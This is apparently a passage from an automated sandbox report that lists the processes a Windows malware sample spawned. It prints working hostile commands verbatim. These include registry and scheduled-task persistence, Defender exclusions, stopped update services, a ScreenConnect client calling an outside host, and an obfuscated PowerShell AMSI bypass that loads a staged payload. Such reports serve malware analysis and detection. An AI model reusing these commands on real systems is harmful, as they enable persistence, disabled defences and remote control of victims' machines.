        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        5⤵
        
        PID:10840
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        5⤵
        
        PID:12116
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        
        PID:11916
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        
        PID:7524
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        5⤵
        Power Settings
        
        PID:12580
- - C:\Users\Admin\AppData\Local\Temp\a\nc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nc.exe"
    3⤵
    PID:676
- - C:\Users\Admin\AppData\Local\Temp\a\Invoice4231284.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Invoice4231284.exe"
    3⤵
    PID:4884
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e89d9b3b19f1f9d9\ScreenConnect.ClientSetup.msi"
      4⤵
      PID:7808
- C:\Windows\SysWOW64\ipconfig.exe
  "C:\Windows\SysWOW64\ipconfig.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Gathers network information
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3636
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Windows\SysWOW64\svchost.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4456
- C:\Windows\SysWOW64\autochk.exe
  "C:\Windows\SysWOW64\autochk.exe"
  2⤵
  PID:3508
- C:\Windows\SysWOW64\autochk.exe
  "C:\Windows\SysWOW64\autochk.exe"
  2⤵
  PID:2792
- C:\Windows\SysWOW64\cscript.exe
  "C:\Windows\SysWOW64\cscript.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4744
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Windows\SysWOW64\svchost.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1164
- - C:\Windows\SysWOW64\comp.exe
    "C:\Windows\SysWOW64\comp.exe"
    3⤵
    PID:8900
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:3092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2340 -ip 2340
1⤵
PID:1192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1212 -ip 1212
1⤵
PID:2372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1476 -ip 1476
1⤵
PID:3848

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7144 -ip 7144
1⤵
PID:6412

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
1⤵
PID:8172

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6372
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C93DF4E2973A4B9165C91764552277E1 C
  2⤵
  PID:7380
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIA4E6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240690546 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    PID:7608
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:7832
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding BB06130EC3BEE35B2C837B5EC1B6BC5B
  2⤵
  PID:6260
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 710A077FF0596C3CA7A5E75D44BC8D96 E Global\MSI0000
  2⤵
  PID:7452

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:7312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7600 -ip 7600
1⤵
PID:8084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8096 -ip 8096
1⤵
PID:8048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 8152 -ip 8152
1⤵
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1640 -ip 1640
1⤵
PID:7072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 7468 -ip 7468
1⤵
PID:3588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 6392 -ip 6392
1⤵
PID:8044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2988 -ip 2988
1⤵
PID:7428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6420 -ip 6420
1⤵
PID:2148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 8080 -ip 8080
1⤵
PID:7920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2612 -ip 2612
1⤵
PID:4700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7840 -ip 7840
1⤵
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1988 -ip 1988
1⤵
PID:5656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 7428 -ip 7428
1⤵
PID:7960

C:\Program Files (x86)\ScreenConnect Client (521ba1a49534efec)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (521ba1a49534efec)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=prof.innocreed.com&p=8041&s=b8b1f799-5bcb-4507-99a4-e00cc813c923&k=BgIAAACkAABSU0ExAAgAAAEAAQDxzniyrxPJmAREwbdhEEjYiFwxioJPRw81JU80K0iGNLg85g4Izq17OYLfHGUplyXRfFIUEsvuhxAzRGUdjFttNsJd424BpdB4Rjg0Jn3t7kzyRvcrsw6%2f0idf74hUGrtqRGCZlpVb4Ll05y2Svw1OBKqeyIx2UwG%2beKfQmrDEaFyUZVDkyqr1MQJunoSSDsoYS3wVn5DI0AwT5sKhlbDo758KsxvYJGduJ33exFGJpEYgjiCoRVKxCZRvEvQqs1j2SMMMGFn49C5ES6%2fbW2MnEq6Ta%2f4TtCt%2b4z1wlAsWMIze2DWotO0QY%2fUe2i4Ul0GCQo0SnFnBeB7LNgM7Rde1&c=Installs&c=&c=INS&c=&c=&c=&c=&c="
1⤵
PID:1536
- C:\Program Files (x86)\ScreenConnect Client (521ba1a49534efec)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (521ba1a49534efec)\ScreenConnect.WindowsClient.exe" "RunRole" "69c30ce0-cb4d-4176-bca0-ca1a9249d174" "User"
  2⤵
  PID:5124
- C:\Program Files (x86)\ScreenConnect Client (521ba1a49534efec)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (521ba1a49534efec)\ScreenConnect.WindowsClient.exe" "RunRole" "6a7e5856-8bf0-4fe6-a795-68ad9257e782" "System"
  2⤵
  PID:6568

C:\ProgramData\WindowsServices\WindowsAutHost
C:\ProgramData\WindowsServices\WindowsAutHost
1⤵
PID:5968
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4600
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:8228
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:416
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:8208
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:8288
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:8340
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:8452
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:8512
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:8520
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:8532
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:8556
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:8572
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:8620
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:8728

C:\Users\Admin\AppData\Local\Temp\winservice.exe
"C:\Users\Admin\AppData\Local\Temp\winservice.exe"
1⤵
PID:8756

C:\ProgramData\vstjqfa\aqjfb.exe
"C:\ProgramData\vstjqfa\aqjfb.exe"
1⤵
PID:1612

C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe
"C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe"
1⤵
PID:3092

C:\Users\Admin\AppData\Roaming\done12312.exe
"C:\Users\Admin\AppData\Roaming\done12312.exe"
1⤵
PID:7224
- C:\Users\Admin\AppData\Roaming\done12312.exe
  "C:\Users\Admin\AppData\Roaming\done12312.exe"
  2⤵
  PID:7264
- C:\Users\Admin\AppData\Roaming\done12312.exe
  "C:\Users\Admin\AppData\Roaming\done12312.exe"
  2⤵
  PID:5384
- C:\Users\Admin\AppData\Roaming\done12312.exe
  "C:\Users\Admin\AppData\Roaming\done12312.exe"
  2⤵
  PID:2624
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 844
  2⤵
  - Program crash
  PID:7740

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:9188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7224 -ip 7224
1⤵
PID:8776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2120 -ip 2120
1⤵
PID:6940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5568 -ip 5568
1⤵
PID:3924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 9172 -ip 9172
1⤵
PID:5656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2428 -ip 2428
1⤵
PID:7648

C:\Users\Admin\AppData\Local\Temp\winservice.exe
"C:\Users\Admin\AppData\Local\Temp\winservice.exe"
1⤵
PID:3376

C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe
"C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe"
1⤵
PID:4012

C:\Users\Admin\AppData\Roaming\done12312.exe
"C:\Users\Admin\AppData\Roaming\done12312.exe"
1⤵
PID:1376
- C:\Users\Admin\AppData\Roaming\done12312.exe
  "C:\Users\Admin\AppData\Roaming\done12312.exe"
  2⤵
  PID:3520
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 800
  2⤵
  - Program crash
  PID:2536

C:\Users\Admin\AppData\Roaming\V4VHskG.exe
"C:\Users\Admin\AppData\Roaming\V4VHskG.exe"
1⤵
PID:3132

C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
1⤵
PID:6772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1376 -ip 1376
1⤵
PID:7528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 7284 -ip 7284
1⤵
PID:6788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2120 -ip 2120
1⤵
PID:532

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2484
- C:\Windows\explorer.exe
  explorer.exe /LOADSAVEDWINDOWS
  2⤵
  PID:6476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 8936 -ip 8936
1⤵
PID:11796

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
1⤵
PID:12076
- C:\Program Files (x86)\Google\Update\Install\{934DE0A0-D839-4A75-B70C-B9B36C196AB2}\134.0.6998.89_chrome_installer.exe
  "C:\Program Files (x86)\Google\Update\Install\{934DE0A0-D839-4A75-B70C-B9B36C196AB2}\134.0.6998.89_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Windows\TEMP\guiBA73.tmp"
  2⤵
  PID:3304
- - C:\Program Files (x86)\Google\Update\Install\{934DE0A0-D839-4A75-B70C-B9B36C196AB2}\CR_0A5C7.tmp\setup.exe
    "C:\Program Files (x86)\Google\Update\Install\{934DE0A0-D839-4A75-B70C-B9B36C196AB2}\CR_0A5C7.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{934DE0A0-D839-4A75-B70C-B9B36C196AB2}\CR_0A5C7.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Windows\TEMP\guiBA73.tmp"
    3⤵
    PID:12020
- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
  "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xMjIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xMjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7REI0NzAwNEYtMjQ2RC00NkFELTk3NzYtQ0Q4MzYxODZCMkU4fSIgdXNlcmlkPSJ7NENDODIzM0UtNTNCRi00QURELTk1NzMtMkZGMTdCN0M0QkZGfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0UzMEM5Njk3LTg2OTItNDVFOC04NzNGLTlEMUUzQ0Y0QzUzNn0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0NC40NTI5IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTM0LjAuNjk5OC44OSIgYXA9Ing2NC1zdGFibGUtc3RhdHNkZWZfMSIgbGFuZz0iZW4iIGJyYW5kPSJDSEJGIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMjMiIGlpZD0iezQ2MTFFMDg3LUNCNzAtMjQ0Qi05MjAyLUY2MDUzNTdBMDJGNH0iIGNvaG9ydD0iMTpndS9pMTk6IiBjb2hvcnRuYW1lPSJTdGFibGUgSW5zdGFsbHMgJmFtcDsgVmVyc2lvbiBQaW5zIj48ZXZlbnQgZXZlbnR0eXBlPSI5IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGRvd25sb2FkZXI9Indpbmh0dHAiIHVybD0iaHR0cDovL2VkZ2VkbC5tZS5ndnQxLmNvbS9lZGdlZGwvcmVsZWFzZTIvY2hyb21lL2NqZzI0MmY3MnFybnd5eHVjcDN6b2Ric3ppXzEzNC4wLjY5OTguODkvMTM0LjAuNjk5OC44OV9jaHJvbWVfaW5zdGFsbGVyLmV4ZSIgZG93bmxvYWRlZD0iMTE5OTAzNjAwIiB0b3RhbD0iMTE5OTAzNjAwIiBkb3dubG9hZF90aW1lX21zPSIzNDA1MSIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjYiIGVycm9yY29kZT0iMTI0IiBleHRyYWNvZGUxPSI1IiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iMjA4MyIgZG93bmxvYWRfdGltZV9tcz0iNDAyNTAiIGRvd25sb2FkZWQ9IjExOTkwMzYwMCIgdG90YWw9IjExOTkwMzYwMCIgaW5zdGFsbF90aW1lX21zPSIzNTM1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9360

C:\Users\Admin\AppData\Local\Temp\winservice.exe
"C:\Users\Admin\AppData\Local\Temp\winservice.exe"
1⤵
PID:9312

C:\Users\Admin\AppData\Roaming\done12312.exe
"C:\Users\Admin\AppData\Roaming\done12312.exe"
1⤵
PID:10628
- C:\Users\Admin\AppData\Roaming\done12312.exe
  "C:\Users\Admin\AppData\Roaming\done12312.exe"
  2⤵
  PID:9532
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 10628 -s 796
  2⤵
  - Program crash
  PID:1172

C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe
"C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe"
1⤵
PID:10636

C:\Users\Admin\AppData\Roaming\V4VHskG.exe
"C:\Users\Admin\AppData\Roaming\V4VHskG.exe"
1⤵
PID:2208

C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
1⤵
PID:3448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:wpvltDFiiOne{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vtzpIlTJRcthPl,[Parameter(Position=1)][Type]$kUmRfuqlqM)$sVEkbeyXtSu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+'e'+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+[Char](77)+'odu'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+[Char](108)+'e'+[Char](103)+'at'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+','+[Char](65)+'n'+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+','+[Char](65)+'ut'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$sVEkbeyXtSu.DefineConstructor(''+'R'+'T'+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+[Char](97)+'me'+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+'By'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$vtzpIlTJRcthPl).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$sVEkbeyXtSu.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+'k'+''+[Char](101)+'',''+'P'+''+'u'+'b'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+'Hi'+[Char](100)+''+[Char](101)+''+[Char](66)+'ySi'+'g'+''+[Char](44)+'N'+[Char](101)+'w'+[Char](83)+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$kUmRfuqlqM,$vtzpIlTJRcthPl).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $sVEkbeyXtSu.CreateType();}$cfhwhaoVvqZGk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+'t'+''+'e'+'m'+'.'+''+'d'+'ll')}).GetType(''+'M'+''+'i'+''+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+'n3'+[Char](50)+''+[Char](46)+''+'U'+'n'+[Char](115)+'a'+'f'+'e'+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+'h'+''+[Char](111)+''+'d'+''+'s'+'');$cjQusUMFeKLqou=$cfhwhaoVvqZGk.GetMethod('G'+[Char](101)+''+'t'+'P'+[Char](114)+'o'+[Char](99)+'A'+'d'+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags]('Pu'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'ati'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vEYQzWGdwWzjzDfjkFd=wpvltDFiiOne @([String])([IntPtr]);$wDvkutKhhzmiyqTunqpwoV=wpvltDFiiOne @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mTFQZqAMvEt=$cfhwhaoVvqZGk.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+'n'+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+'l'+''+[Char](108)+'')));$zAzHBFJaGCkpXy=$cjQusUMFeKLqou.Invoke($Null,@([Object]$mTFQZqAMvEt,[Object](''+[Char](76)+'o'+'a'+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$vnapGdGVnHFEKKcIT=$cjQusUMFeKLqou.Invoke($Null,@([Object]$mTFQZqAMvEt,[Object](''+[Char](86)+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+''+'l'+''+'P'+''+[Char](114)+''+[Char](111)+'tec'+'t'+'')));$VWVrHck=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zAzHBFJaGCkpXy,$vEYQzWGdwWzjzDfjkFd).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$ckmPmNLVvTTwtYEBk=$cjQusUMFeKLqou.Invoke($Null,@([Object]$VWVrHck,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$aonJiMNYkm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vnapGdGVnHFEKKcIT,$wDvkutKhhzmiyqTunqpwoV).Invoke($ckmPmNLVvTTwtYEBk,[uint32]8,4,[ref]$aonJiMNYkm);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](203-72),[Byte](225+10),[Byte](59-59),[Byte](178+6),[Byte](157-70),[Byte](50-50),[Byte](95-88),[Byte](61+67),[Byte](221-90),[Byte](173+20),[Byte](211-211),[Byte](14+181),[Byte](21+110),[Byte](24+211),[Byte](168-168)),0,$ckmPmNLVvTTwtYEBk,146-131);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vnapGdGVnHFEKKcIT,$wDvkutKhhzmiyqTunqpwoV).Invoke($ckmPmNLVvTTwtYEBk,[uint32]8,0x20,[ref]$aonJiMNYkm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'FTW'+'A'+'RE').GetValue(''+'$'+'77s'+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Command and Scripting Interpreter: PowerShell
PID:9568

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:12304

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:9620

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
